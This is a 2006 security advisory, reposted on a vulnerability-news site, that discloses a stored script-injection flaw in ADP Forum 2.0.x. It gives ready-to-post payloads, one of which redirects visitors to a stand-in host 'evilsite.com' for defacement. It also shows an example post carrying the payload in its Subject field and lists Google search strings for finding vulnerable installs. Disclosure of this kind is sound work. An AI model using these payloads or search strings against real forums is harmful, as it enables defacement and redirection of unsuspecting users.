Computer Security

Security Advisory: ADP Forum 2.0,* script İnjection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  txtForum: Script Injection Vulnerability

  [SA19165] Nodez "op" File Inclusion and Cross-Site Scripting

  txtForum: Multiple XSS Vulnerabilities

  MyBloggie: Multiple XSS Vulnerabilities

From::) :) <liz0_(at)_bsdmail.com>
Date:09.03.2006
Subject:ADP Forum 2.0,* script İnjection

http://biyosecurity.be/bugs/adpforum2.html


ADP Forum 2.0,* script İnjection
----------------------------------------------------
site:http://www.linux.it/~fedro/
demo:http://www.adp.host.sk/Forum203/
--------------------------------------------------
Post This Code:

<script>alert(/Liz0ziM/)</script>

<script>location.href="http://evilsite.com/deface.html";</script>

vs..
---------------------------------------------------------
Example Post Message :


Name :Liz0ziM
Username :username
Password :password
E-mail :liz0@bsdmail.com
Subject :<script>location.href="http://evilsite.com/deface.html";</script>
Message :LOL :=)

---------------------------------------------------------

Credit:Liz0ziM
Mail :liz0@bsdmail.com
Site :www.biyosecurity.com
BiyoSecurityTeam: Liz0ziM,Codexploder'tq,r00t3rr0r,y3LL0w
------------------------------------------------------------
google:

"ADP Forum 2.0.3 is powered by VzScripts"
"ADP Forum 2.0.2"
"ADP Forum 2.0.1"
"ADP Forum 2.0"

------------------------------------------------------------

Source:

http://www.blogcu.com/Liz0ziM/338614/

http://biyosecurity.be/bugs/adpforum2.html

http://biyosecurity.be/bugs/adpforum2.txt




--
_______________________________________________
Get your free email from http://mymail.bsdmail.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server